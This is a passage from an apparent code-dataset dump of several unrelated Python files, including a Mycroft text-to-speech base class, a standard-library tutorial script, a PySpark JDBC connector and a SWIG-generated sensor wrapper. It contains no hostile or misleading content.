['speak', 'prosody']\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, lang, config, validator, audio_ext='wav',\n phonetic_spelling=True, ssml_tags=None):\n super(TTS, self).__init__()\n self.lang = lang or 'en-us'\n self.config = config\n self.validator = validator\n self.phonetic_spelling = phonetic_spelling\n self.audio_ext = audio_ext\n self.ssml_tags = ssml_tags or []\n\n self.voice = config.get(\"voice\")\n self.filename = '/tmp/tts.wav'\n self.enclosure = None\n random.seed()\n self.queue = Queue()\n self.playback = PlaybackThread(self.queue)\n self.playback.start()\n self.clear_cache()\n self.spellings = self.load_spellings()\n\n def load_spellings(self):\n \"\"\"Load phonetic spellings of words as dictionary\"\"\"\n path = join('text', self.lang, 'phonetic_spellings.txt')\n spellings_file = resolve_resource_file(path)\n if not spellings_file:\n return {}\n try:\n with open(spellings_file) as f:\n lines = filter(bool, f.read().split('\\n'))\n lines = [i.split(':') for i in lines]\n return {key.strip(): value.strip() for key, value in lines}\n except ValueError:\n LOG.exception('Failed to load phonetic spellings.')\n return {}\n\n def begin_audio(self):\n \"\"\"Helper function for child classes to call in execute()\"\"\"\n # Create signals informing start of speech\n self.ws.emit(Message(\"recognizer_loop:audio_output_start\"))\n\n def end_audio(self):\n \"\"\"\n Helper function for child classes to call in execute().\n\n Sends the recognizer_loop:audio_output_end message, indicating\n that speaking is done for the moment. It also checks if cache\n directory needs cleaning to free up disk space.\n \"\"\"\n\n self.ws.emit(Message(\"recognizer_loop:audio_output_end\"))\n # Clean the cache as needed\n cache_dir = mycroft.util.get_cache_directory(\"tts\")\n mycroft.util.curate_cache(cache_dir, min_free_percent=100)\n\n # This check will clear the \"signal\"\n check_for_signal(\"isSpeaking\")\n\n def init(self, ws):\n self.ws = ws\n self.playback.init(self)\n self.enclosure = EnclosureAPI(self.ws)\n self.playback.enclosure = self.enclosure\n\n def get_tts(self, sentence, wav_file):\n \"\"\"\n Abstract method that a tts implementation needs to implement.\n Should get data from tts.\n\n Args:\n sentence(str): Sentence to synthesize\n wav_file(str): output file\n\n Returns:\n tuple: (wav_file, phoneme)\n \"\"\"\n pass\n\n def modify_tag(self, tag):\n \"\"\"Override to modify each supported ssml tag\"\"\"\n return tag\n\n @staticmethod\n def remove_ssml(text):\n return re.sub('<[^>]*>', '', text).replace(' ', ' ')\n\n def validate_ssml(self, utterance):\n \"\"\"\n Check if engine supports ssml, if not remove all tags\n Remove unsupported / invalid tags\n\n Args:\n utterance(str): Sentence to validate\n\n Returns: validated_sentence (str)\n \"\"\"\n # if ssml is not supported by TTS engine remove all tags\n if not self.ssml_tags:\n return self.remove_ssml(utterance)\n\n # find ssml tags in string\n tags = re.findall('<[^>]*>', utterance)\n\n for tag in tags:\n if any(supported in tag for supported in self.ssml_tags):\n utterance = utterance.replace(tag, self.modify_tag(tag))\n else:\n # remove unsupported tag\n utterance = utterance.replace(tag, \"\")\n\n # return text with supported ssml tags only\n return utterance.replace(\" \", \" \")\n\n def execute(self, sentence, ident=None):\n \"\"\"\n Convert sentence to speech, preprocessing out unsupported ssml\n\n The method caches results if possible using the hash of the\n sentence.\n\n Args:\n sentence: Sentence to be spoken\n ident: 
Id reference to current interaction\n \"\"\"\n sentence = self.validate_ssml(sentence)\n\n create_signal(\"isSpeaking\")\n if self.phonetic_spelling:\n for word in re.findall(r\"[\\w']+\", sentence):\n if word.lower() in self.spellings:\n sentence = sentence.replace(word,\n self.spellings[word.lower()])\n\n key = str(hashlib.md5(sentence.encode('utf-8', 'ignore')).hexdigest())\n wav_file = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n key + '.' + self.audio_ext)\n\n if os.path.exists(wav_file):\n LOG.debug(\"TTS cache hit\")\n phonemes = self.load_phonemes(key)\n else:\n wav_file, phonemes = self.get_tts(sentence, wav_file)\n if phonemes:\n self.save_phonemes(key, phonemes)\n\n vis = self.visime(phonemes)\n self.queue.put((self.audio_ext, wav_file, vis, ident))\n\n def visime(self, phonemes):\n \"\"\"\n Create visimes from phonemes. Needs to be implemented for all\n tts backend\n\n Args:\n phonemes(str): String with phoneme data\n \"\"\"\n return None\n\n def clear_cache(self):\n \"\"\" Remove all cached files. \"\"\"\n if not os.path.exists(mycroft.util.get_cache_directory('tts')):\n return\n for f in os.listdir(mycroft.util.get_cache_directory(\"tts\")):\n file_path = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n f)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n def save_phonemes(self, key, phonemes):\n \"\"\"\n Cache phonemes\n\n Args:\n key: Hash key for the sentence\n phonemes: phoneme string to save\n \"\"\"\n\n cache_dir = mycroft.util.get_cache_directory(\"tts\")\n pho_file = os.path.join(cache_dir, key + \".pho\")\n try:\n with open(pho_file, \"w\") as cachefile:\n cachefile.write(phonemes)\n except:\n LOG.debug(\"Failed to write .PHO to cache\")\n pass\n\n def load_phonemes(self, key):\n \"\"\"\n Load phonemes from cache file.\n\n Args:\n Key: Key identifying phoneme cache\n \"\"\"\n pho_file = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n key + \".pho\")\n if os.path.exists(pho_file):\n try:\n with open(pho_file, \"r\") as cachefile:\n phonemes = cachefile.read().strip()\n return phonemes\n except:\n LOG.debug(\"Failed to read .PHO from cache\")\n return None\n\n def __del__(self):\n self.playback.stop()\n self.playback.join()\n\n\nclass TTSValidator(object):\n \"\"\"\n TTS Validator abstract class to be implemented by all TTS engines.\n\n It exposes and implements ``validate(tts)`` function as a template to\n validate the TTS engines.\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, tts):\n self.tts = tts\n\n def validate(self):\n self.validate_dependencies()\n self.validate_instance()\n self.validate_filename()\n self.validate_lang()\n self.validate_connection()\n\n def validate_dependencies(self):\n pass\n\n def validate_instance(self):\n clazz = self.get_tts_class()\n if not isinstance(self.tts, clazz):\n raise AttributeError('tts must be instance of ' + clazz.__name__)\n\n def validate_filename(self):\n filename = self.tts.filename\n if not (filename and filename.endswith('.wav')):\n raise AttributeError('file: %s must be in .wav format!' % filename)\n\n dir_path = dirname(filename)\n if not (exists(dir_path) and isdir(dir_path)):\n raise AttributeError('filename: %s is not valid!' 
% filename)\n\n @abstractmethod\n def validate_lang(self):\n pass\n\n @abstractmethod\n def validate_connection(self):\n pass\n\n @abstractmethod\n def get_tts_class(self):\n pass\n\n\nclass TTSFactory(object):\n from mycroft.tts.espeak_tts import ESpeak\n from mycroft.tts.fa_tts import FATTS\n from mycroft.tts.google_tts import GoogleTTS\n from mycroft.tts.mary_tts import MaryTTS\n from mycroft.tts.mimic_tts import Mimic\n from mycroft.tts.spdsay_tts import SpdSay\n from mycroft.tts.ibm_tts import WatsonTTS\n from mycroft.tts.polly_tts import PollyTTS\n from mycroft.tts.bing_tts import BingTTS\n from mycroft.tts.beepspeak_tts import BeepSpeak\n from mycroft.tts.responsive_voice_tts import ResponsiveVoice\n\n CLASSES = {\n \"mimic\": Mimic,\n \"google\": GoogleTTS,\n \"marytts\": MaryTTS,\n \"fatts\": FATTS,\n \"espeak\": ESpeak,\n \"spdsay\": SpdSay,\n \"polly\": PollyTTS,\n \"watson\": WatsonTTS,\n \"bing\": BingTTS,\n \"beep_speak\": BeepSpeak,\n \"responsive_voice\": ResponsiveVoice\n }\n\n @staticmethod\n def create():\n \"\"\"\n Factory method to create a TTS engine based on configuration.\n\n The configuration file ``mycroft.conf`` contains a ``tts`` section with\n the name of a TTS module to be read by this method.\n\n \"tts\": {\n \"module\": \n }\n \"\"\"\n config = Configuration.get()\n lang = config.get(\"lang\", \"en-us\")\n tts_module = config.get('tts', {}).get('module', 'mimic')\n tts_config = config.get('tts', {}).get(tts_module, {})\n tts_lang = tts_config.get('lang', lang)\n clazz = TTSFactory.CLASSES.get(tts_module)\n tts = clazz(tts_lang, tts_config)\n tts.validator.validate()\n return tts\n"} {"ext": "py", "sha": "1a2f30bb9423ca730b6a6febe87834f7af8a0fcc", "content": "import os \n# cur_directory = print(getcwd()) # Return the current working directory \n# # print(cur_directory)\n# print(os.chdir) # Change current working directory \n\n# os.system('mkdir today') # Run the command mkdir in the system shell. \n\n# There was today folder created in the root folder. \n\n# print(dir(os)) # returns a list of all module functions. \n\n# print(help(os)) # returns an extensive manual page crated from the module's docstring/\n\n\n# import shutil \n# shutil.copyfile('data.db', 'archive.db')\n# shutil.move('/build/executables', 'installdir')\n\n\n# import glob\n# file_list = glob.glob('*.py')\n# print(file_list)\n\n\n\n# import sys \n# print(sys.argv)\n\n# # The argparse module provides more sophiscated mechanisms to process command line arguments\n\n# import argparse\n\n# parser = argparse.ArgumentParser(prog = 'top', description = 'Show top lines from each file')\n# parser.add_argument('filenames', nargs='+')\n# parser.add_argument('-l', '--lines', type=int, default=10)\n# args = parser.parse_args()\n# print(args)\n\n\nimport re\n# f_words = re.findall(r'\\bf[a-z]*', 'which foot or hand fell fastest')\n# print(f_words)\n\n# sub = re.sub(r'\\(\\b[a-z]+) \\1', r'\\1', 'cat in the hat')\n# print(sub)\n\n\na = 'tea for too'.replace('too', 'two')\nprint(a)\n\n# Mathematics \n\nimport math \ncos = math.cos(math.pi / 4)\nprint(cos)\n\nlog = math.log(1024, 2)\nprint(log)\n\n\n# Random module provides tools for making random selections. 
\n\n\n# import random \n# fruit = random.choice(['apple', 'pear', 'banana'])\n# print(fruit)\n\n# sample = random.sample(range(100), 10) # sampling without replacement \n\n# print(sample)\n\n# random_float = random.random()\n# print(random_float)\n\n# integer_number = random.randrange(6) # random integer chosen from range(6)\n# print(integer_number)\n\n\n\n\n# The statistics modue calculates basic statistical properties \n# (the mean, median, variance, etc) of numeric data. \n\nimport statistics\ndata = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]\nprint(\"mean\", statistics.mean(data))\nprint(\"median :\", statistics.median(data))\nprint(\"variance :\", statistics.variance(data))\n\n#\n# from urllib.request import urlopen\n# with urlopen('http://tycho.usno.navy.mil/cgi-bin/timer.pl') as response:\n# for line in response:\n# line = line.decode('utf-8') # Decoding the binary data to text.\n# if 'EST' in line or 'EDT' in line: # Look for Eastern Time\n# print(line)\n#\n# import smtplib\n#\n# server = smplib.SMTP('localhost')\n# server.sendmail('soothsayer@exmple.org', 'jcaesar@exmple.org',\n# \"\"\"To : jcaesar@example.org\n# From : soothsayer@example.org\n#\n# Beware the Ideas of March.\n# \"\"\")\n# server.quit()\n#\n# import zlib\n# s = b'witch which has which witches wrist watch'\n# print(len(s))\n#\n# t = zlib.compress(s)\n# print(len(t))\n#\n# u = zlib.decompress(t)\n# print(u)\n#\n# print(zlib.crc32(s))\n\nfrom timeit import Timer\n\na = Timer('t=a; a=b; b=t', 'a=1;b=2').timeit()\nprint(a)\nb = Timer('a,b = b,a', 'a=1; b=2').timeit()\nprint(b)\n\n#\n#\n# def for_number(number):\n# for_list = []\n# for i in range(0, 2000000):\n# for_list.append(i)\n#\n# def while_number(number):\n# while_list = []\n# i = 0\n# while i < 2000000:\n# while_list.append(i)\n# i = i + 1\n#\n# d = Timer(while_number(2000000)).timeit()\n#\n# print(d)\n#\n# c = Timer(for_number(2000000)).timeit()\n# print(c)\n\ndef average(values):\n \"\"\"Computes the arithmetic mean of a list of numbers.\n\n >>> print(average([20, 30, 70]))\n 40.0\n\n\n \"\"\"\n return sum(values) / len(values)\n\nimport doctest\n\nz = doctest.testmod()\nprint(z)\n\n\nimport unittest\n\nclass TestStatisticalFunctions(unittest.TestCase):\n\n def test_average(self):\n self.assertEqual(average([20,30,70]), 40.0)\n self.assertEqual(round(average([1, 5, 7]), 1), 4.3)\n with self.assertRaises((ZeroDivisionError)):\n average([])\n with self.assertRaises(TypeError):\n average(20, 30, 70)\n\nunittest.main()"} {"ext": "py", "sha": "1a2f30dc447e062965e5d3168f863193937e133d", "content": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\"\"\"\r\n The Clear BSD License\r\n\r\n Copyright (c) – 2016, NetApp, Inc. All rights reserved.\r\n\r\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:\r\n\r\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\r\n\r\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\r\n\r\n * Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\r\n\r\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n\"\"\"\r\n\r\n\r\n\r\n\r\nimport unittest\r\nfrom netapp.santricity.models.symbol.not_on_preferred_path import NotOnPreferredPath\r\n\r\nclass NotOnPreferredPathTest(unittest.TestCase):\r\n \"\"\"\r\n NOTE: This class is auto generated by the swagger code generator program.\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n # Try instantiating the model\r\n def test_not_on_preferred_path(self):\r\n not_on_preferred_path_obj = NotOnPreferredPath()\r\n self.assertNotEqual(not_on_preferred_path_obj, None)\r\n\r\n\r\n"} {"ext": "py", "sha": "1a2f3124887d8ffabdb5af92e1f6a3900185b604", "content": "#!/usr/local/bin/python3\nfrom os import system, path, getcwd\n\nfilePath = \"assets/alexa-20180320.csv\"\nprint(\"read file: \" + filePath)\nwith open(filePath) as f:\n content = f.readlines()\nlines = [x.strip() for x in content]\n\nfor i in range(0, 10):\n siteName = lines[i].split(\",\")[1]\n print(\"Dealing with \" + str(i) + \" \" + siteName)\n script = \"scripts/extractArchive.sh\"\n siteName = siteName.replace(\".\", \"_\")\n command = \"sh %s %s\" % (script, siteName)\n print(\"run command %s\" % command)\n system(command)\n"} {"ext": "py", "sha": "1a2f318380d27f90a9f3d30e3f8393cadd4da648", "content": "#!/usr/bin/python3\nimport sys\n\n\ndef safe_print_integer_err(value):\n is_int = True\n try:\n print(\"{:d}\".format(value))\n except Exception as e:\n print(\"Exception:\", e, file=sys.stderr)\n is_int = False\n return is_int\n"} {"ext": "py", "sha": "1a2f31eabf5896f9a474363a06a67a0704df22be", "content": "import hug\nimport api\n\n@hug.cli()\n@hug.get('/health')\n@hug.local()\ndef health_check():\n return {'message': 'Status: Running'}\n\n\n# @hug.extend_api('/{BASE_URL_ROUTE}')\n@hug.extend_api()\ndef apis():\n return [api]\n"} {"ext": "py", "sha": "1a2f32f465d251d0b5f8bae0c4db8c8199036fb8", "content": "import pyspark.sql.functions as psf\nfrom pyspark.sql import SparkSession, DataFrame\n\nfrom .data_link import DataLink\n\n\nclass JdbcDataLink(DataLink):\n def __init__(\n self,\n environment: str,\n session: SparkSession,\n url: str,\n username: str,\n password: str,\n driver: str,\n table: str,\n save_mode: str = \"error\",\n number_of_partitions: int = 1,\n partition_column: str = \"\",\n ):\n super().__init__(environment, session)\n\n self.number_of_partitions = number_of_partitions\n self.partition_column = partition_column\n self.save_mode = save_mode\n self.connection_properties = {\n \"url\": url,\n \"user\": username,\n \"password\": password,\n \"driver\": driver,\n \"dbtable\": table,\n }\n\n def read(self) -> DataFrame:\n # Partition parameters are only applicable for read operation\n # for now, order is important as some values can be overwritten\n reader = self.spark.read.format(\"jdbc\").options(**self.connection_properties)\n\n 
if self.number_of_partitions == 1:\n return reader.load()\n\n else:\n # We need a partition column\n if self.partition_column == \"\":\n raise AssertionError(\"Partitioning column should not be empty.\")\n\n col = psf.col(self.partition_column)\n # Retrieve lower and upper bound first to determine the degree of parallelism\n lower_bound, upper_bound = (\n reader.load()\n .select(\n psf.min(col).alias(\"mmin\"),\n psf.max(col).alias(\"mmax\"),\n )\n .collect()[0]\n )\n\n return (\n reader.option(\"partitionColumn\", self.partition_column)\n .option(\"numPartitions\", str(self.number_of_partitions))\n .option(\"lowerBound\", str(lower_bound))\n .option(\"upperBound\", str(upper_bound))\n .load()\n )\n\n def write(self, frame: DataFrame) -> None:\n (\n frame.write.format(\"jdbc\")\n .mode(self.save_mode)\n .options(**self.connection_properties)\n .save()\n )\n"} {"ext": "py", "sha": "1a2f334492020c13f496704486b147409467400f", "content": "# This file was automatically generated by SWIG (http://www.swig.org).\n# Version 3.0.12\n#\n# Do not make changes to this file unless you know what you are doing--modify\n# the SWIG interface file instead.\n\nfrom sys import version_info as _swig_python_version_info\nif _swig_python_version_info >= (2, 7, 0):\n def swig_import_helper():\n import importlib\n pkg = __name__.rpartition('.')[0]\n mname = '.'.join((pkg, '_coarse_sun_sensor')).lstrip('.')\n try:\n return importlib.import_module(mname)\n except ImportError:\n return importlib.import_module('_coarse_sun_sensor')\n _coarse_sun_sensor = swig_import_helper()\n del swig_import_helper\nelif _swig_python_version_info >= (2, 6, 0):\n def swig_import_helper():\n from os.path import dirname\n import imp\n fp = None\n try:\n fp, pathname, description = imp.find_module('_coarse_sun_sensor', [dirname(__file__)])\n except ImportError:\n import _coarse_sun_sensor\n return _coarse_sun_sensor\n try:\n _mod = imp.load_module('_coarse_sun_sensor', fp, pathname, description)\n finally:\n if fp is not None:\n fp.close()\n return _mod\n _coarse_sun_sensor = swig_import_helper()\n del swig_import_helper\nelse:\n import _coarse_sun_sensor\ndel _swig_python_version_info\n\ntry:\n _swig_property = property\nexcept NameError:\n pass # Python < 2.2 doesn't have 'property'.\n\ntry:\n import builtins as __builtin__\nexcept ImportError:\n import __builtin__\n\ndef _swig_setattr_nondynamic(self, class_type, name, value, static=1):\n if (name == \"thisown\"):\n return self.this.own(value)\n if (name == \"this\"):\n if type(value).__name__ == 'SwigPyObject':\n self.__dict__[name] = value\n return\n method = class_type.__swig_setmethods__.get(name, None)\n if method:\n return method(self, value)\n if (not static):\n if _newclass:\n object.__setattr__(self, name, value)\n else:\n self.__dict__[name] = value\n else:\n raise AttributeError(\"You cannot add attributes to %s\" % self)\n\n\ndef _swig_setattr(self, class_type, name, value):\n return _swig_setattr_nondynamic(self, class_type, name, value, 0)\n\n\ndef _swig_getattr(self, class_type, name):\n if (name == \"thisown\"):\n return self.this.own()\n method = class_type.__swig_getmethods__.get(name, None)\n if method:\n return method(self)\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (class_type.__name__, name))\n\n\ndef _swig_repr(self):\n try:\n strthis = \"proxy of \" + self.this.__repr__()\n except __builtin__.Exception:\n strthis = \"\"\n return \"<%s.%s; %s >\" % (self.__class__.__module__, self.__class__.__name__, strthis,)\n\ntry:\n _object = object\n 
_newclass = 1\nexcept __builtin__.Exception:\n class _object:\n pass\n _newclass = 0\n\nclass SwigPyIterator(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)\n\n def __init__(self, *args, **kwargs):\n raise AttributeError(\"No constructor defined - class is abstract\")\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_SwigPyIterator\n __del__ = lambda self: None\n\n def value(self):\n return _coarse_sun_sensor.SwigPyIterator_value(self)\n\n def incr(self, n=1):\n return _coarse_sun_sensor.SwigPyIterator_incr(self, n)\n\n def decr(self, n=1):\n return _coarse_sun_sensor.SwigPyIterator_decr(self, n)\n\n def distance(self, x):\n return _coarse_sun_sensor.SwigPyIterator_distance(self, x)\n\n def equal(self, x):\n return _coarse_sun_sensor.SwigPyIterator_equal(self, x)\n\n def copy(self):\n return _coarse_sun_sensor.SwigPyIterator_copy(self)\n\n def next(self):\n return _coarse_sun_sensor.SwigPyIterator_next(self)\n\n def __next__(self):\n return _coarse_sun_sensor.SwigPyIterator___next__(self)\n\n def previous(self):\n return _coarse_sun_sensor.SwigPyIterator_previous(self)\n\n def advance(self, n):\n return _coarse_sun_sensor.SwigPyIterator_advance(self, n)\n\n def __eq__(self, x):\n return _coarse_sun_sensor.SwigPyIterator___eq__(self, x)\n\n def __ne__(self, x):\n return _coarse_sun_sensor.SwigPyIterator___ne__(self, x)\n\n def __iadd__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___iadd__(self, n)\n\n def __isub__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___isub__(self, n)\n\n def __add__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___add__(self, n)\n\n def __sub__(self, *args):\n return _coarse_sun_sensor.SwigPyIterator___sub__(self, *args)\n def __iter__(self):\n return self\nSwigPyIterator_swigregister = _coarse_sun_sensor.SwigPyIterator_swigregister\nSwigPyIterator_swigregister(SwigPyIterator)\n\n\ndef new_doubleArray(nelements):\n return _coarse_sun_sensor.new_doubleArray(nelements)\nnew_doubleArray = _coarse_sun_sensor.new_doubleArray\n\ndef delete_doubleArray(ary):\n return _coarse_sun_sensor.delete_doubleArray(ary)\ndelete_doubleArray = _coarse_sun_sensor.delete_doubleArray\n\ndef doubleArray_getitem(ary, index):\n return _coarse_sun_sensor.doubleArray_getitem(ary, index)\ndoubleArray_getitem = _coarse_sun_sensor.doubleArray_getitem\n\ndef doubleArray_setitem(ary, index, value):\n return _coarse_sun_sensor.doubleArray_setitem(ary, index, value)\ndoubleArray_setitem = _coarse_sun_sensor.doubleArray_setitem\n\ndef new_longArray(nelements):\n return _coarse_sun_sensor.new_longArray(nelements)\nnew_longArray = _coarse_sun_sensor.new_longArray\n\ndef delete_longArray(ary):\n return _coarse_sun_sensor.delete_longArray(ary)\ndelete_longArray = _coarse_sun_sensor.delete_longArray\n\ndef longArray_getitem(ary, index):\n return _coarse_sun_sensor.longArray_getitem(ary, index)\nlongArray_getitem = _coarse_sun_sensor.longArray_getitem\n\ndef longArray_setitem(ary, index, value):\n return _coarse_sun_sensor.longArray_setitem(ary, index, value)\nlongArray_setitem = _coarse_sun_sensor.longArray_setitem\n\ndef new_intArray(nelements):\n return _coarse_sun_sensor.new_intArray(nelements)\nnew_intArray = _coarse_sun_sensor.new_intArray\n\ndef delete_intArray(ary):\n return _coarse_sun_sensor.delete_intArray(ary)\ndelete_intArray = _coarse_sun_sensor.delete_intArray\n\ndef 
intArray_getitem(ary, index):\n return _coarse_sun_sensor.intArray_getitem(ary, index)\nintArray_getitem = _coarse_sun_sensor.intArray_getitem\n\ndef intArray_setitem(ary, index, value):\n return _coarse_sun_sensor.intArray_setitem(ary, index, value)\nintArray_setitem = _coarse_sun_sensor.intArray_setitem\n\ndef new_shortArray(nelements):\n return _coarse_sun_sensor.new_shortArray(nelements)\nnew_shortArray = _coarse_sun_sensor.new_shortArray\n\ndef delete_shortArray(ary):\n return _coarse_sun_sensor.delete_shortArray(ary)\ndelete_shortArray = _coarse_sun_sensor.delete_shortArray\n\ndef shortArray_getitem(ary, index):\n return _coarse_sun_sensor.shortArray_getitem(ary, index)\nshortArray_getitem = _coarse_sun_sensor.shortArray_getitem\n\ndef shortArray_setitem(ary, index, value):\n return _coarse_sun_sensor.shortArray_setitem(ary, index, value)\nshortArray_setitem = _coarse_sun_sensor.shortArray_setitem\n\n\ndef getStructSize(self):\n try:\n return eval('sizeof_' + repr(self).split(';')[0].split('.')[-1])\n except (NameError) as e:\n typeString = 'sizeof_' + repr(self).split(';')[0].split('.')[-1]\n raise NameError(e.message + '\\nYou tried to get this size macro: ' + typeString + \n '\\n It appears to be undefined. \\nYou need to run the SWIG GEN_SIZEOF' + \n ' SWIG macro against the class/struct in your SWIG file if you want to ' + \n ' make this call.\\n')\n\n\ndef protectSetAttr(self, name, value):\n if(hasattr(self, name) or name == 'this'):\n object.__setattr__(self, name, value)\n else:\n raise ValueError('You tried to add this variable: ' + name + '\\n' + \n 'To this class: ' + str(self))\n\ndef protectAllClasses(moduleType):\n import inspect\n clsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n for member in clsmembers:\n try:\n exec(str(member[0]) + '.__setattr__ = protectSetAttr')\n exec(str(member[0]) + '.getStructSize = getStructSize') \n except (AttributeError, TypeError) as e:\n pass\n\n\n\ndef new_boolArray(nelements):\n return _coarse_sun_sensor.new_boolArray(nelements)\nnew_boolArray = _coarse_sun_sensor.new_boolArray\n\ndef delete_boolArray(ary):\n return _coarse_sun_sensor.delete_boolArray(ary)\ndelete_boolArray = _coarse_sun_sensor.delete_boolArray\n\ndef boolArray_getitem(ary, index):\n return _coarse_sun_sensor.boolArray_getitem(ary, index)\nboolArray_getitem = _coarse_sun_sensor.boolArray_getitem\n\ndef boolArray_setitem(ary, index, value):\n return _coarse_sun_sensor.boolArray_setitem(ary, index, value)\nboolArray_setitem = _coarse_sun_sensor.boolArray_setitem\nclass IntVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, IntVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, IntVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.IntVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.IntVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.IntVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.IntVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.IntVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.IntVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.IntVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return 
_coarse_sun_sensor.IntVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.IntVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.IntVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.IntVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.IntVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.IntVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.IntVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.IntVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.IntVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.IntVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.IntVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.IntVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.IntVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.IntVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.IntVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.IntVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_IntVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.IntVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.IntVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.IntVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.IntVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.IntVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.IntVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.IntVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.IntVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_IntVector\n __del__ = lambda self: None\nIntVector_swigregister = _coarse_sun_sensor.IntVector_swigregister\nIntVector_swigregister(IntVector)\n\nclass DoubleVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, DoubleVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, DoubleVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.DoubleVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.DoubleVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.DoubleVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.DoubleVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.DoubleVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.DoubleVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.DoubleVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___setitem__(self, *args)\n\n def pop(self):\n return 